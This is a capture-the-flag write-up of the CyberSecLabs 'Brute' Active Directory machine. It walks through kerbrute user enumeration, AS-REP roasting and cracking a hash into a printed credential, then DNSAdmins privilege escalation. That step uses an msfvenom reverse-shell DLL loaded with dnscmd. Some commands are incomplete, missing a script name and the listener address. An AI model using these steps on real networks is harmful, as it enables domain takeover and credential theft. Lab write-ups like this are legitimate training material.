CyberSecLabs - Brute

⇒ Brute was an medium active directory machine created by “wtfitsaduck” that taught us :

  • How to enumerate AD users by kerbruting with a wordlist to identify valid users
  • Checking if DONT_REQ_PREAUTH set for the users then kerberoasting.
  • Privilege Escalation from DNS Admins Group to Domain Admin.


Enumerating and Kerberoasting

⇒ So we enumerated smb and performed ldapqueries but came up empty handed. So next we decided to run kerbrute with username wordlist (from seclists ) to identify valid users which could have DONT_REQ_PREAUTH set which will allow us to perform kerberoasting using GetNPUsers ( impacket tool )

./kerbrute_linux_amd64 userenum -d brute.csl –dc names.txt

  • Next we will kerberoast accounts that have DONT_REQ_PREAUTH set using impacket tool GetNPUsers and retrieve ASREP which we will crack using john.

python3 -dc-ip brute.csl/ -usersfile users.txt -format hashcat -outputfile test11.txt

  • Cracking it using john

tess : Unique1

⇒ So now we have credentials for user tess. We can connect to the machine as user tess using evil-winrm

Privilege Escalation to Root [ Exploiting DNSAdmins Group ]

⇒ We discover that the user tess is a part of DNSAdmins group. We can leverage this to escalate our privileges to the domain admin. This is an fantastic blog on how to exploit it :

  • First we’ll generate the dll payload using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=7777 –platform=windows -f dll > enox.dll

  • Next we will be importing the plugin to the server

dnscmd.exe /config /serverlevelplugindll C:\Users\Tess\Documents\enox.dll

  • Now we just have to restart the dns service

    sc.exe stop dns

    sc.exe start dns

⇒ Then we get an reverse shell as system after the service is restarted and our plugin is executed :